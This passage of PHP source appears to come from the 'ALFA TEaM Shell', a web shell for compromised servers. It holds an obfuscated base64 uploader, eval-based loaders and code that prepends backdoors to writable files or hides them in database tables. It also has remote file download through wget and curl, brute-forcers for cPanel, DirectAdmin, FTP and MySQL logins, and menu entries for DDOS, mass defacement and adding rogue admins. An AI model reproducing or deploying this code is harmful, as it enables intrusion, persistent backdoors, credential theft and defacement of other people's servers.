'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+'; $alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);'; define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))"); define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false)); if(!isset($_POST['ajax'])){ function Alfa_GetDisable_Function(){ $disfun = @ini_get('disable_functions'); $afa = 'All Functions Accessible'; if(empty($disfun))return($afa); $s = explode(',',$disfun); $s = array_unique($s); $i=0; $b=0; $func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl'); $black_list = array(); $allow_list = array(); foreach($s as $d){ $d=trim($d); if(empty($d)||!is_callable($d))continue; if(!function_exists($d)){ if(in_array($d,$func)){ $dis .= $d." | ";$b++; $black_list[] = $d; }else{ $allow_list[] = $d; } $i++; } } if($i==0)return($afa); if($i <= count($func)){ $all = array_values(array_merge($black_list, $allow_list)); return(''.implode(" | ", $all).''); } return(''.$dis.'Show All ('.$i.')'); } function AlfaNum(){ $args = func_get_args(); $alfax = array(); $find = array(); for($i=1;$i<=10;$i++){ $alfax[] = $i; } foreach($args as $arg){ $find[] = $arg; } echo ''; } if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; $freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?'; $totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?'; $totalSpace = $totalSpace?$totalSpace:1; $on=" ON "; $of=" OFF "; $none=" NONE "; if(function_exists('ssh2_connect')) $ssh2=$on; else $ssh2=$of; if(function_exists('curl_version')) $curl=$on; else $curl=$of; if(function_exists('mysql_get_client_info')) $mysql=$on; else $mysql=$of; if(function_exists('mssql_connect')) $mssql=$on; else $mssql=$of; if(function_exists('pg_connect')) $pg=$on; else $pg=$of; if(function_exists('oci_connect')) $or=$on; else $or=$of; if(@ini_get('disable_functions')) $disfun=@ini_get('disable_functions'); else $disfun="All Functions Enable"; if(@ini_get('safe_mode')) $safe_modes="ON"; else $safe_modes="OFF"; $cgi_shell="OFF"; if(@ini_get('open_basedir')){ $basedir_data = @ini_get('open_basedir'); if(strlen($basedir_data)>120){ $open_b=substr($basedir_data,0, 120)."..."; }else{ $open_b = $basedir_data; } }else{$open_b=$none;} if(@ini_get('safe_mode_exec_dir')) $safe_exe=@ini_get('safe_mode_exec_dir'); else $safe_exe=$none; if(@ini_get('safe_mode_include_dir')) $safe_include=@ini_get('safe_mode_include_dir'); else $safe_include=$none; if(!function_exists('posix_getegid')) { $user = function_exists("get_current_user")?@get_current_user():"????"; $uid = function_exists("getmyuid")?@getmyuid():"????"; $gid = function_exists("getmygid")?@getmygid():"????"; $group = "?"; }else{ $uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????"); $gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????"); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $drives = ""; foreach(range('a','z') as $drive) if(@is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; $csscode =' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;'; echo ' ..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.' ::.. '; echo " "; $cmd_uname = alfaEx("uname -a",false,false); $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !'); if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";} echo '
'; for($s=1;$s<=10;$s++){ echo ''; } echo '
'; if($GLOBALS['sys']=='unix'){ $useful_downloader = ''; if(!@ini_get('safe_mode')){ if(strlen(alfaEx("id",false,false))>0){ echo ''; }else{ echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true"; } }else{ echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true"; } }else{ echo ''; } $quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = 'ON';}else{$magic = 'OFF';} echo ''; if($GLOBALS['sys']=="win"){ echo ''; } echo '
Uname: '.$uname.'
User: '. $uid . ' [ ' . $user . ' ] Group: ' . $gid . ' [ ' . $group . ' ]
PHP: '.@phpversion(). ' Safe Mode: '.$safe_modes.'
ServerIP: '.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).' Your IP: '.@$_SERVER["REMOTE_ADDR"].'
DateTime: '.date('Y-m-d H:i:s').'
Domains: '; if($GLOBALS['sys']=='unix'){ $d0mains = _alfa_file("/etc/named.conf",false); if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{ $count=0; foreach($d0mains as $d0main){ if(@strstr($d0main,"zone")){ preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ flush(); $count++;}}} echo "$count Domains";}} else{echo("Cant Read [ /etc/named.conf ]");} echo '
HDD: Total:'.alfaSize($totalSpace).' Free:' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]
useful:--------------
Downloader: --------------
Useful : '; $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl'); $x=0; foreach($userful as $item)if(alfaWhich($item)){$x++;echo ''.$item.'';} if($x==0){echo "--------------";$GLOBALS["need_to_update_header"] = "true";} echo '
Downloader: '; $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); $x=0; foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo ''.$item2.'';} if($x==0){echo "--------------";$GLOBALS["need_to_update_header"] = "true";} echo '
Windows:'; echo alfaEx('ver',false,false); echo '
Downloader: -------------
Disable Functions: '.Alfa_GetDisable_Function().'
CURL :'.$curl.' | SSH2 : '.$ssh2.' | Magic Quotes : '.$magic.' | MySQL :'.$mysql.' | MSSQL :'.$mssql.' | PostgreSQL :'.$pg.' | Oracle :'.$or.' '.($GLOBALS['sys']=="unix"?'| CGI : '.$cgi_shell:"").'
Sole Sad & Invisible
Open_basedir :'.$open_b.' | Safe_mode_exec_dir :'.$safe_exe.' | Safe_mode_include_dir :'.$safe_include.'
SoftWare: '.@getenv('SERVER_SOFTWARE').'
DRIVE: '.$drives.'
PWD: '.$cwd_links.' [ Home Shell ] [ BACK ]
    '; $li = array('FilesMan'=>'Home','proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Mysql Dumper','hash'=>'En-Decoder','connect'=>'BC','ssh2'=>'SSH2', 'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools', 'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors', 'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher', 'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','settings'=>'Alfa Settings','plus'=>'Alfa +','selfrm'=>'Remove Shell' ); foreach($li as $key=>$value){ echo('
  • '.$value.'
  • '."\n"); } if(!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass'])) echo '
  • LogOut
'; else echo '
';}else{ @error_reporting(E_ALL ^ E_NOTICE); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('magic_quotes_runtime', 0); @set_time_limit(0); }} function alfalogout(){ unset($_SESSION['AlfaUser'],$_SESSION['AlfaPass']); echo("
Logout...
"); } function showAnimation($name){ return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;'; } function __showicon($r){ $s['btn']='http://solevisible.com/images/btn.png'; $s['alfamini']='http://solevisible.com/images/alfamini.png'; $s['loader']='http://solevisible.com/images/loader.png'; //return 'data:image/png;base64,'.__get_resource($s[$r]); return $s[$r]; } function alfainbackdoor(){ alfahead(); echo '

| Install BackDoor |

| In File | | In DataBase |

'; $error = 'Error In Inject BackDoor...!
File Loader is not Writable Or Not Exists...!
'; $success= 'Success...!'; $textarea = ""; $select = "
Use:
"; $cwd = 'Example: /home/alfa/public_html/index.php'; if($_POST['alfa1']=='file'){ echo("

| In File |

{$select}
Backdoor Loader:
Key:
{$textarea}

"); if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){ $method = $_POST['alfa2']; $file = $_POST['alfa3']; $shell = $_POST['alfa4']; $key = str_replace(array('"','\''),'',trim($_POST['alfa5'])); if($key=='')$key='alfa'; if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];} $code = '\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>'; if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."
Run With: ".basename($file)."?alfa=".$key.'
');}else{__alert($error);}}} if($_POST['alfa1']=='db'){ echo("

| In DataBase |

".getConfigHtml('all')."

"); $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true), 'td6' => array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50') ); create_table($table); echo("

{$select}

"); echo($textarea); echo("

"); if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){ $dbhost = $_POST['alfa2']; $dbuser = $_POST['alfa3']; $dbpw = $_POST['alfa4']; $dbname = $_POST['alfa5']; $file = $_POST['alfa6']; $method = $_POST['alfa7']; $shell = $_POST['alfa8']; $key = str_replace(array('"','\''),'',trim($_POST['alfa9'])); if($key=='')$key='alfa'; if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];} if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){ $code = '\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>'; if(@is_file($file)&&@is_writable($file)){ @mysqli_query($conn,'DROP TABLE `alfa_bc`'); @mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)'); @mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")'); @file_put_contents($file,$code."\n".@file_get_contents($file)); __alert($success."
Run With: ".basename($file)."?alfa=".$key.'
');}else{__alert($error);}}}} echo('
'); alfafooter(); } function alfawhois(){ echo("

| Whois |

>');return false;\">
Url:

"); if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){ $site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']); $target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site; $data = @file_get_contents($target); if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);} $target = @json_decode($data,true); echo __pre(); if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}} echo("
"); } function alfaremotedl(){ alfahead(); echo("

| Upload From Url |

>');return false;\">

Url:
   

Path:

"); if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){ echo __pre(); $url = $_POST['alfa1']; $path = $_POST['alfa2']; echo('
'); if(__download($url,$path)){ echo('Success...!'); }else{ echo('Error...!'); } echo('
'); } echo("
"); alfafooter(); } function __download($url,$path=false){ if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false; $saveas = basename(rawurldecode($url)); if($path){$saveas=$path.$saveas;} if($content = __read_file($url)){ if(@is_file($saveas))@unlink($saveas); if(__write_file($saveas, $content)){return true;}} $buff = alfaEx("wget ".$url." -O ".$saveas); if(@is_file($saveas)) return true; $buff = alfaEx("curl ".$url." -o ".$saveas); if(@is_file($saveas)) return true; $buff = alfaEx("lwp-download ".$url." ".$saveas); if(@is_file($saveas)) return true; $buff = alfaEx("lynx -source ".$url." > ".$saveas); if(@is_file($saveas)) return true; $buff = alfaEx("GET ".$url." > ".$saveas); if(@is_file($saveas)) return true; $buff = alfaEx("links -source ".$url." > ".$saveas); if(@is_file($saveas)) return true; $buff = alfaEx("fetch -o ".$saveas." -p ".$url); if(@is_file($saveas)) return true; return false; } function clean_string($string){ if(function_exists("iconv")){ $s = trim($string); $s = iconv("UTF-8", "UTF-8//IGNORE", $s); } return $s; } function __read_file($file, $boom = true){ $content = false; if($fh = @fopen($file, "rb")){ $content = ""; while(!feof($fh)){ $content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192); } } if(empty($content)||!$content){ $content = alfaEx("cat '".addslashes($file)."'"); } return $content; } function alfaSettings(){ alfahead(); AlfaNum(6,7,8,9,10); echo '

| Settings |

| Generall Setting | | Change Color |

'; if($_POST["alfa8"] == "main"){ echo '

| Settings |

'; $lg_array = array('0'=>'No','1'=>'Yes'); $penc_array = array('false'=>'No','true'=>'Yes'); $protect_html = ""; $icon_html = ""; $postEnc_html = ""; $login_html = ""; foreach($lg_array as $key=>$val)$protect_html .= ''; foreach($lg_array as $key=>$val)$icon_html .= ''; foreach($penc_array as $key=>$val)$postEnc_html .= ''; $lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound"); foreach($lg_array as $key=>$val)$login_html .= ''; echo ''; echo '
Protect:
Post Encryption:
Show Icons:
login Page:
UserName:
Password:

'; if($_POST['alfa5']=='>>'){ echo __pre(); if(!empty($_POST['alfa3'])){ $protect = $_POST['alfa1']; $lgpage = $_POST['alfa2']; $username = $_POST['alfa3']; $password = md5($_POST['alfa4']); $icon = $_POST['alfa6']; $post_encrypt = $_POST['alfa7']; @chdir($GLOBALS['home_cwd']); $basename = @basename($_SERVER['PHP_SELF']); $data = @file_get_contents($basename); $find_user = '/\'user\'(.*?),/i'; $find_pw = '/\'pass\'(.*?),/i'; $find_lg = '/\'login_page\'(.*?),/i'; $find_p = '/\'safemode\'(.*?),/i'; $icons = '/\'show_icons\'(.*?),/i'; $postEnc = '/\'post_encryption\'(.*?),/i'; if(!empty($username)&&preg_match($find_user,$data,$e)){ $new = '\'user\' => \''.$username.'\','; $data = str_replace($e[0],$new,$data); } if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){ $new = '\'pass\' => \''.$password.'\','; $data = str_replace($e[0],$new,$data); } if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){ $new = '\'login_page\' => \''.$lgpage.'\','; $data = str_replace($e[0],$new,$data); } if(!empty($find_p)&&preg_match($find_p,$data,$e)){ $new = '\'safemode\' => \''.$protect.'\','; $data = str_replace($e[0],$new,$data); } if(preg_match($icons,$data,$e)){ $new = '\'show_icons\' => \''.$icon.'\',';$data = str_replace($e[0],$new,$data); } if(preg_match($postEnc,$data,$e)){ $new = '\'post_encryption\' => '.$post_encrypt.','; $data = str_replace($e[0],$new,$data); } if(@file_put_contents($basename,$data)){ echo 'UserName: '.$username.'
Password: '.$_POST['alfa4'].''; }else{ __alert("File has no edit access...!"); } }else{ __alert("UserName is Empty !"); } } }elseif($_POST["alfa8"] == "color"){ echo('

| Custom Color |

'); echo ''; $template = ''; $x = 1; foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){ $multi = ""; if(is_array($value)){ if(isset($value["multi_selector"])){ $multi = __ZW5jb2Rlcg(json_encode($value)); } } $value = alfa_getColor($key); $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key)); echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template); } echo ''; echo '
Help
{index}
{target}:
-
*
Use Default Color:

'; if($_POST['alfa7']=='export'){ echo __pre(); $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array(); $glob_colors = $GLOBALS["__ALFA_COLOR__"]; $array = array(); foreach($glob_colors as $k => $v){ if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){ $v = trim($colors[$k]); }else{ $v = trim(is_array($v)?$v["key_color"]:$v); } $array[$k] = $v; } $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf"; $config = json_encode($array, JSON_PRETTY_PRINT); if(!@file_put_contents($file, $config)){ echo('

Color Config:

'); }else{ echo('

Download Config

'); } } if($_POST['alfa2']=='>>'){ echo __pre(); $colors = json_decode($_POST["alfa1"],true); $array = ""; $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false; $glob_colors = $GLOBALS["__ALFA_COLOR__"]; foreach($glob_colors as $k => $v){ if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){ $v = trim($colors[$k]); }else{ $v = trim(is_array($v)?$v["key_color"]:$v); } $array .= '"'.trim($k).'" => "'.$v.'",'; } @chdir($GLOBALS['home_cwd']); $basename = @basename($_SERVER['PHP_SELF']); $data = @file_get_contents($basename); $color = '/\'color\'(.*?)\),/s'; if(preg_match($color,$data,$e)){ $new = "'color' => array(".$array."),"; $data = str_replace($e[0],$new,$data); if(@file_put_contents($basename, $data)){ echo("

[+] Success...

"); }else{ echo("

[-] We Not have permission to Edit shell...!

"); } }else{ echo("

[-] Error...!

"); } } } echo('
'); alfafooter(); } function alfaplus(){ alfahead(); echo '

| Alfa + |

| News | | Tools | | About Us |

'; if($_POST['alfa1']=='news'||$_POST['alfa1']=='tools'){ try{ $s1 = 'http://solevisible.com/'.($_POST['alfa1']=='news'?'news.php':'tools.php'); $msg = "

Can`t Connect to Remote Server ...!
Please Try Again Later...!

"; $news = new AlfaCURL(); if($news->Send($s1)){ $xml = $news->Send($s1); }else{ $xml = false; } if($xml){ if(@simplexml_load_string($xml)){ $doc = new DOMDocument; $doc->loadXML($xml); $data = $doc->getElementsByTagName('data')->item(0); $items = $data->getElementsByTagName('item'); foreach($items as $item){ $title = $item->getElementsByTagName('title')->item(0)->nodeValue; $description = $item->getElementsByTagName('description')->item(0)->nodeValue; $link = $item->getElementsByTagName('link')->item(0)->nodeValue; $pubDate = $item->getElementsByTagName('pubDate')->item(0)->nodeValue; echo(__pre()."
$title
$description
Date: $pubDate
"); } }else{ echo($msg); } }else{ echo($msg); } }catch(Exception $e){ echo $e->getMessage(); }}elseif($_POST['alfa1']=='about'){ echo __pre()."

☮ ~ z-hackerz ~ ☮
Shell Edit By Ar1Ber3 & Invisible (ALFA TEaM)
Contact : /z-hackerz.com/forum/members/ar1ber3.143/
Form : z-hackerz.com
"; } echo(''); alfafooter(); } function alfaDumper(){ alfahead(); echo('
'); AlfaNum(8,9,10); echo "

| Mysql Database Dumper |


".getConfigHtml('all')."

"; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50') ); create_table($table); echo "

"; $username = ($_POST['alfa3']); $password = ($_POST['alfa4']); $dbname = ($_POST['alfa5']); $dfile = ($_POST['alfa6']); $host = ($_POST['alfa7']); if(!empty($dbname)){ echo __pre(); $msg = "
Check this : ".$dfile."
"; if(@mysqli_connect($host,$username,$password,$dbname)){ if(strlen(alfaEx("mysqldump"))>0){ alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'"); echo($msg); }else{ __alert("Error...!"); } }else{ echo('
mysqli_connect : Error!
'); } } echo('
'); alfafooter(); } function Alfa_DirectAdmin_Cracker($info){ if(!$info['mysql']) $url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN'; else $url = $info['protocol'].$info['target'].'/phpmyadmin'; $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0'); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($curl, CURLOPT_HEADER,0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_URL,$url); curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']); if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY); $result = curl_exec($curl); $curl_errno = curl_errno($curl); $curl_error = curl_error($curl); if ($curl_errno > 0) {echo "Error: $curl_error
";} elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){ echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].' Login Success....
'; $info['target'] = $url; CrackerResualt($info); } curl_close($curl); } function Alfa_CP_Cracker($info){ $url = $info['protocol'].$info['target'].':'.$info['port']; $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0'); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($curl, CURLOPT_HEADER,0); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r")); curl_setopt($curl, CURLOPT_URL, $url); $result = curl_exec($curl); $curl_errno = curl_errno($curl); $curl_error = curl_error($curl); if ($curl_errno > 0) {echo "Error: $curl_error
";} elseif(preg_match('/filemanager/i',$result)){ echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].' Login Success....
'; $info['target'] = $url; CrackerResualt($info); } curl_close($curl); } function Alfa_FTP_Cracker($info){ $url = $info['protocol'].$info['target']; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0'); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password'].""); $result = curl_exec($curl); $curl_errno = curl_errno($curl); $curl_error = curl_error($curl); if ($curl_errno > 0) {echo "Error: $curl_error
";} elseif(preg_match('/(\d+):(\d+)/i',$result)){ echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].' Login Success....
'; $info['target'] = $url; CrackerResualt($info); } curl_close($curl); } function Alfa_Mysql_Cracker($info){ if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){ CrackerResualt($info); echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].' Login Success....
'; } } function Alfa_FTPC($info){ if($con=@ftp_connect($info['target'],$info['port'])){ if($con){ $login=@ftp_login($con,$info['username'],$info['password']); if($login){CrackerResualt($info);}}} @ftp_close($con); } function CrackerResualt($info){ $res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ; $c = @fopen($info['fcrack'],'a+'); @fwrite($c, $res); @fclose($c); } function Alfa_Call_Function_Cracker($method,$info){ switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;} } function alfaCrackers(){ alfahead(); AlfaNum(9,10); echo '

| Brute Forcer |


Login Page: Protocol: Website/ip Address: Port:
Users ListPasswords
 

Save Result Into File

